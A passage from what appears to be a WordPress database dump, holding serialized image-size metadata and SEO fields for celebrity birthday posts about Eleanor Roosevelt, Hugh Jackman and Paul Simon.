orRoosevelt-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-696x463.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:463;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:29:\"EleanorRoosevelt-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:28:\"EleanorRoosevelt-632x420.jpg\";s:5:\"width\";i:632;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2104,358,'_wp_attached_file','2015/10/Eleanor-Roosevelt.jpg'),(2105,358,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:404;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2015/10/Eleanor-Roosevelt.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-202x300.jpg\";s:5:\"width\";i:202;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"Eleanor-Roosevelt-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"Eleanor-Roosevelt-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-404x261.jpg\";s:5:\"width\";i:404;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-404x462.jpg\";s:5:\"width\";i:404;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-404x385.jpg\";s:5:\"width\";i:404;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-404x486.jpg\";s:5:\"width\";i:404;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-404x580.jpg\";s:5:\"width\";i:404;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:29:\"Eleanor-Roosevelt-283x420.jpg\";s:5:\"width\";i:283;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2106,359,'_wp_attached_file','2015/10/Eleanor_Roosevelt.jpg'),(2107,359,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:494;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2015/10/Eleanor_Roosevelt.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-247x300.jpg\";s:5:\"width\";i:247;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"Eleanor_Roosevelt-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"Eleanor_Roosevelt-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-494x261.jpg\";s:5:\"width\";i:494;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-494x462.jpg\";s:5:\"width\";i:494;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-494x385.jpg\";s:5:\"width\";i:494;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-494x486.jpg\";s:5:\"width\";i:494;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-494x580.jpg\";s:5:\"width\";i:494;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:29:\"Eleanor_Roosevelt-346x420.jpg\";s:5:\"width\";i:346;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2108,356,'_thumbnail_id','357'),(2109,356,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(2110,356,'slide_template','default'),(2111,356,'_yoast_wpseo_focuskw','Eleanor Roosevelt'),(2112,356,'_yoast_wpseo_title','Anna Eleanor Roosevelt\'s Birthday & Facts'),(2113,356,'_yoast_wpseo_metadesc','Eleanor Roosevelt was the first lady to Franklin D. Roosevelt and an outspoken civil rights activist. Read more about her incredible life here...'),(2114,356,'_yoast_wpseo_linkdex','91'),(2115,356,'post_views_count','207'),(2116,343,'_wp_attachment_image_alt','Vladimir Putin'),(2118,341,'_wp_old_slug','vladmir-putin-birthday'),(2120,342,'_wp_old_slug','matt-damon'),(2121,361,'_edit_lock','1444945246:6'),(2122,361,'_edit_last','6'),(2123,362,'_wp_attached_file','2015/10/Hugh-Jackman.jpg'),(2124,362,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:24:\"2015/10/Hugh-Jackman.jpg\";s:5:\"sizes\";a:20:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Hugh-Jackman-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Hugh-Jackman-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Hugh-Jackman-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"Hugh-Jackman-1024x580.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Hugh-Jackman-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2125,363,'_wp_attached_file','2015/10/Hugh_Jackman.jpg'),(2126,363,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:340;s:6:\"height\";i:465;s:4:\"file\";s:24:\"2015/10/Hugh_Jackman.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-219x300.jpg\";s:5:\"width\";i:219;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Hugh_Jackman-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Hugh_Jackman-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-340x220.jpg\";s:5:\"width\";i:340;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-340x364.jpg\";s:5:\"width\";i:340;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-340x261.jpg\";s:5:\"width\";i:340;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-340x462.jpg\";s:5:\"width\";i:340;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-340x385.jpg\";s:5:\"width\";i:340;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Hugh_Jackman-307x420.jpg\";s:5:\"width\";i:307;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2127,361,'_thumbnail_id','362'),(2128,361,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(2129,361,'slide_template','default'),(2130,361,'_yoast_wpseo_focuskw','Hugh Jackman'),(2131,361,'_yoast_wpseo_title','Hugh Jackman\'s Birthday & Other Facts'),(2132,361,'_yoast_wpseo_metadesc','Hugh Jackman is famous for the role he has played as Wolverine. We take a look into the life of this famous actor to see who he truly is.'),(2133,361,'_yoast_wpseo_linkdex','96'),(2134,361,'post_views_count','352'),(2171,366,'_edit_lock','1445444205:6'),(2172,367,'_edit_lock','1445447031:6'),(2173,367,'_edit_last','6'),(2174,366,'_edit_last','6'),(2175,368,'_wp_attached_file','2015/10/Paul-Simon.jpg'),(2176,368,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:425;s:4:\"file\";s:22:\"2015/10/Paul-Simon.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Paul-Simon-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Paul-Simon-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-534x425.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Paul-Simon-632x420.jpg\";s:5:\"width\";i:632;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:17:\"Paul Simon - 297\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:1:{i:0;s:8:\"concerts\";}}}'),(2177,369,'_wp_attached_file','2015/10/Paul_Simon.jpg'),(2178,369,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:640;s:4:\"file\";s:22:\"2015/10/Paul_Simon.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:20:\"Paul_Simon-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:21:\"Paul_Simon-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-480x261.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-480x462.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-480x385.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-480x486.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-480x580.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:22:\"Paul_Simon-315x420.jpg\";s:5:\"width\";i:315;s:6:\"height\";i:420;s:9: